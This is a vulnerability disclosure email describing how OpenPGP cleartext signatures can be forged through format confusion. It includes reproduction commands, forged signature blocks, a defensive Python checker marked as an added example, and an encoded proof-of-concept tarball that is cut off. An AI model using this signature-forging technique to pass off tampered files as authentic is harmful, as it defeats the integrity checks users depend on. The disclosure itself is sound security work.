Dear security teams,

this email is to inform you about a vulnerability in your software implementations. Please note the disclosure timeline at the end of this email. Please acknowledge receipt to confirm that this message has reached you.

---

# OpenPGP Cleartext Signature Framework Susceptible to Format Confusion

An attacker can exploit ambiguous *OpenPGP* format syntax to deceive users into misinterpreting an ASCII-armored [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) as a [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#section-7) message through a malformed header.

## Impact

This format confusion enables substitution of the original signed data with malicious content while retaining a seemingly valid cryptographic verification. Users and automated checks may unknowingly accept altered or spoofed payloads as authentic, because popular PGP implementations, such as *GnuPG*, by default do not explicitly display the actual data bound by the signature during validation.

Despite [documented issues](https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s) with the *Cleartext Signature Framework* and *GnuPG* [recommending against it](https://www.gnupg.org/documentation/manuals/gnupg/Operational-GPG-Commands.html#:~:text=It%20is%20suggested%20to%20avoid%20cleartext%20signatures%20in%20favor%20of%20detached%20signatures.), usage of cleartext signatures remains prevalent.

The attack requires a valid *OpenPGP* signature applied to known, but not attacker-chosen, arbitrary data.

## Details

The attack is to disguise a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) (e.g. created through `gpg --sign`) as a [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) message (`gpg --clearsign`).

[RFC 9580](https://www.rfc-editor.org/rfc/rfc9580.html) mandates that a *One-Pass Signed Message* consists of the following packets:

- a [One-Pass Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t): unprotected metadata, including:
  - hash algorithm,
  - public key algorithm,
  - short key ID of the signing key;
- a [Literal Data Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id): the signed data;
- a [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2): a binding between some public key and some data.

Any *OpenPGP* signature format containing a valid [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2) alongside the signed data, such as the [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo), can be converted to a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) through:

- forgery of a [One-Pass Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-one-pass-signature-packet-t) (it contains no cryptographically protected contents), and
- encoding of the signed data in a [Literal Data Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-literal-data-packet-type-id), and
- copying the [Signature Packet](https://www.rfc-editor.org/rfc/rfc9580.html#name-signature-packet-type-id-2).

Since the conversion preserves both the signed data and the signature, cryptographic integrity remains intact. No keying material, neither private nor public, is required to perform the conversion, and a *Python* script for this procedure is provided in the appendix as a proof of concept.
The attack leverages the ambiguity of the [OpenPGP Armor Header Line](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line), which allows a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) to be wrapped in either `BEGIN PGP MESSAGE` or `BEGIN PGP SIGNATURE`. Additionally, the *OpenPGP* specification does not mandate a particular handling of non-whitespace characters preceding or following an ASCII-armored *OpenPGP* message.

A recipient of an OpenPGP signature might be deceived by an adversary through a malformed [Armor Header Line](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line) into incorrectly assuming that the [Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) was used. This allows arbitrary data to be stuffed in, which the user incorrectly believes to be signed. Common OpenPGP implementations silently discard any superfluous data preceding the [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages), including malformed [Armor Header Lines](https://www.rfc-editor.org/rfc/rfc9580.html#name-armor-header-line). The [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages) subsequently passes cryptographic validation. By default, *GnuPG* does not output the signed data during validation, which further helps in deceiving the user.

### Detailed steps to reproduce

#### Scenario

Alice wants to transmit a file (`UwUntu.iso`) to Bob. Alice wants to assert her authorship and prevent manipulation of the file. Alice has created an OpenPGP keypair and securely transferred her public key to Bob.

Mallory is a threat actor able to intercept and manipulate communications between Alice and Bob.
Her goal is to replace the legitimate file (`UwUntu.iso`) with her malicious one (`EnterpriseLinux.iso`) while seemingly preserving valid cryptographic verification. `UwUntu.iso` and `EnterpriseLinux.iso` differ in their contents and thus in their SHA256 checksums. Mallory possesses neither private nor public keying material used by Alice. Mallory did not interfere with the initial key exchange between Alice and Bob.

#### Procedure

Alice decides to clearsign the *SHA256* checksum of `UwUntu.iso`:

`sha256sum --status UwUntu.iso --tag | gpg --clearsign --local-user alice@example.org --armor | tee UwUntu.iso-CHECKSUM`

```
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----
```

Alice then starts transmission of `UwUntu.iso` and `UwUntu.iso-CHECKSUM` to Bob. Mallory intercepts this transmission.

She then converts the [Cleartext Signature](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo) to a [One-Pass Signed Message](https://www.rfc-editor.org/rfc/rfc9580.html#name-openpgp-messages), which she disguises as a [Cleartext Signature](https://www.rfc-editor.org/rfc/rfc9580.html#name-cleartext-signature-framewo):

```shell
$ python fake-signature/main.py ./UwUntu.iso-CHECKSUM /dev/stdout
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
```

Mallory replaces `` with the checksum tag of her malicious `EnterpriseLinux.iso`:

```
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
```

Mallory replaces the contents of `UwUntu.iso` with those of `EnterpriseLinux.iso`. Having modified both `UwUntu.iso` and the signature `UwUntu.iso-CHECKSUM`, Mallory forwards the files to Bob.
Bob verifies the signature:

```shell
$ cat ./UwUntu.iso-CHECKSUM | gpg --verify
gpg: Signature made Sun Jul 6 17:10:24 2025 CEST
gpg: using EDDSA key E81E1001FC831508C5AC7CEF00D80363D1094973
gpg: Good signature from "Alice " [ultimate]
```

Confident in the legitimacy of `UwUntu.iso-CHECKSUM`, Bob verifies that `UwUntu.iso` actually matches `UwUntu.iso-CHECKSUM`:

`sha256sum --check UwUntu.iso-CHECKSUM`

```
UwUntu.iso: OK
```

Mallory's attack succeeded, as she deceived Bob into believing the manipulated `UwUntu.iso` to be cryptographically signed by Alice. The verification process involving cleartext signatures and SHA256 checksums is used by multiple well-known software distributions and exists beyond the scope of this theoretical example.

## Recommendations

Removal of the Cleartext Signature Framework from the *OpenPGP* standard helps resolve the [issues with the Cleartext Signature Framework](https://www.rfc-editor.org/rfc/rfc9580.html#name-issues-with-the-cleartext-s). Furthermore, deprecation allows for a graceful phase-out.

*OpenPGP* users should avoid using cleartext signatures, as is also recommended by *GnuPG*.

To prevent confusion about the actual signed data, *OpenPGP* implementations should output the data bound by the signature during validation by default. *sequoia-sq* does so. *GnuPG* does not and requires the `--output` option to be set.

When working with *OpenPGP* signatures in general, users should instruct their PGP implementation to output the signed data and only use this output for any further or related tasks.
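As an added example, not part of this advisory, not its PoC tarball and not GnuPG code, the following Python helper does for a checksum file what the Details section and the Recommendations ask of an implementation: it matches the armor lines strictly, walks the packet sequence, lists every line that an implementation would silently skip (including the malformed `-----BEGIN PGP SIGNED MESSAGE------` header), and returns the bytes that the signature actually binds. The two sample inputs are the armored blocks shown above; the function names `parse_packets` and `inspect_signature_file` and the report keys are hypothetical.

```python
# Added defensive helper (not GnuPG, not the advisory's PoC): report which bytes a signature binds.
import base64
import re

# Real RFC 9580 armor lines carry exactly five dashes per side; look-alikes are the malformed headers.
ARMOR_LOOKALIKE = re.compile(r"^-+(BEGIN|END) PGP .*-+$")
CSF_BEGIN, SIG_BEGIN = "-----BEGIN PGP SIGNED MESSAGE-----", "-----BEGIN PGP SIGNATURE-----"
SIG_END = "-----END PGP SIGNATURE-----"
TAG_SIGNATURE, TAG_ONE_PASS, TAG_LITERAL = 2, 4, 11

# Alice's genuine cleartext signature, copied from the advisory above.
GENUINE = """\
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

SHA256 (UwUntu.iso) = e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQToHhAB/IMVCMWsfO8A2ANj0QlJcwUCaGqR4AAKCRAA2ANj0QlJ
c0I9AP4qiHxx+D90OGDEGFcdSkjiUSD/fLhlYoVDiHhnPSzHbwEAuyUxrYYg23kA
VHK9nCInS1fNKbWo8NiedYVOXnISOgs=
=a6YF
-----END PGP SIGNATURE-----
"""

# Mallory's disguised One-Pass Signed Message with the swapped checksum line, also from the advisory.
DISGUISED = """\
-----BEGIN PGP SIGNED MESSAGE------
Hash: SHA512

SHA256 (UwUntu.iso) = 62545c1551bcc06a72163775203d9163f46e47930cd024b4df270afa11a57ba9
-----BEGIN PGP SIGNATURE-----

kA0DAQoWANgDY9EJSXMBrFx0AGhqkeBTSEEyNTYgKFV3VW50dS5pc28pID0gZTNi
MGM0NDI5OGZjMWMxNDlhZmJmNGM4OTk2ZmI5MjQyN2FlNDFlNDY0OWI5MzRjYTQ5
NTk5MWI3ODUyYjg1NYh1BAEWCgAdFiEE6B4QAfyDFQjFrHzvANgDY9EJSXMFAmhq
keAACgkQANgDY9EJSXNCPQD+Koh8cfg/dDhgxBhXHUpI4lEg/3y4ZWKFQ4h4Zz0s
x28BALslMa2GINt5AFRyvZwiJ0tXzSm1qPDYnnWFTl5yEjoL
=//2u
-----END PGP SIGNATURE-----
"""


def parse_packets(data: bytes) -> list:
    """(tag, body) pairs for a packet sequence (RFC 9580 section 4); definite lengths only."""
    packets, pos = [], 0
    while pos < len(data):
        ctb = data[pos]
        if not ctb & 0x80:
            raise ValueError(f"not a packet header at offset {pos}")
        if ctb & 0x40:                                   # new-format header
            tag, first = ctb & 0x3F, data[pos + 1]
            if first < 192:
                length, hdr = first, 2
            elif first < 224:
                length, hdr = ((first - 192) << 8) + data[pos + 2] + 192, 3
            elif first == 255:
                length, hdr = int.from_bytes(data[pos + 2:pos + 6], "big"), 6
            else:
                raise ValueError("partial body lengths not supported")
        else:                                            # old-format header
            tag, ltype = (ctb >> 2) & 0x0F, ctb & 0x03
            size = {0: 1, 1: 2, 2: 4}[ltype]             # KeyError for the indeterminate length type 3
            length, hdr = int.from_bytes(data[pos + 1:pos + 1 + size], "big"), 1 + size
        if pos + hdr + length > len(data):
            raise ValueError("truncated packet")
        packets.append((tag, data[pos + hdr:pos + hdr + length]))
        pos += hdr + length
    return packets


def inspect_signature_file(text: str) -> dict:
    """Classify the file, return the bytes the signature covers, and list what gpg would skip."""
    lines = text.splitlines()
    index = lambda needle: next((i for i, l in enumerate(lines) if l == needle), None)
    after_blank = lambda ls: ls[ls.index("") + 1:] if "" in ls else ls   # skip Hash:/armor headers
    csf_begin, sig_begin, sig_end = index(CSF_BEGIN), index(SIG_BEGIN), index(SIG_END)
    if sig_begin is None or sig_end is None:
        raise ValueError("no well-formed PGP SIGNATURE armor block")
    # Non-blank lines before the first strictly valid armor line: visible to the user, ignored by gpg.
    ignored = [l for l in lines[:sig_begin if csf_begin is None else csf_begin] if l.strip()]
    malformed = [l for l in ignored if ARMOR_LOOKALIKE.match(l)]
    cleartext = None
    if csf_begin is not None:                            # dash-unescape the cleartext section
        cleartext = "\n".join(l[2:] if l.startswith("- ") else l
                              for l in after_blank(lines[csf_begin + 1:sig_begin]))
    body = after_blank(lines[sig_begin + 1:sig_end])
    b64 = "".join(l.strip() for l in body if not l.startswith("="))   # drop the CRC24 line
    packets = parse_packets(base64.b64decode(b64, validate=True))
    tags = [tag for tag, _ in packets]
    # Literal Data body: format octet, filename length, filename, 4-byte date, then the data itself.
    signed = next((b[6 + b[1]:] for t, b in packets if t == TAG_LITERAL), None)
    verdict = "detached or unrecognised signature"
    if TAG_LITERAL in tags or TAG_ONE_PASS in tags:
        verdict = "one-pass signed message: only the Literal Data packet is signed"
    elif csf_begin is not None and not ignored and all(t == TAG_SIGNATURE for t in tags):
        verdict, signed = "cleartext signature: the cleartext section is signed", cleartext.encode()
    return {"verdict": verdict, "packet_tags": tags, "signed_data": signed,
            "ignored_lines": ignored, "malformed_armor": malformed}
```

Called on Mallory's file, `inspect_signature_file(DISGUISED)` reports packet tags `[4, 11, 2]`, i.e. a One-Pass Signed Message, and returns Alice's original `e3b0…` checksum line as the signed data, while the `62545c…` line that Bob read appears only under `ignored_lines` together with the six-dash header. Comparing `signed_data` with the text that `sha256sum --check` is about to consume is exactly the step that `gpg --verify` alone does not perform for the user; on Alice's genuine file the same call yields tags `[2]` and the cleartext section as the signed data.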
## Credits

- Finder credits: 49016
- PoC & writeup: 49016, Flüpke, Sivizius, Liam

## Appendix

### fake-signature.tar.xz.b64

```
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
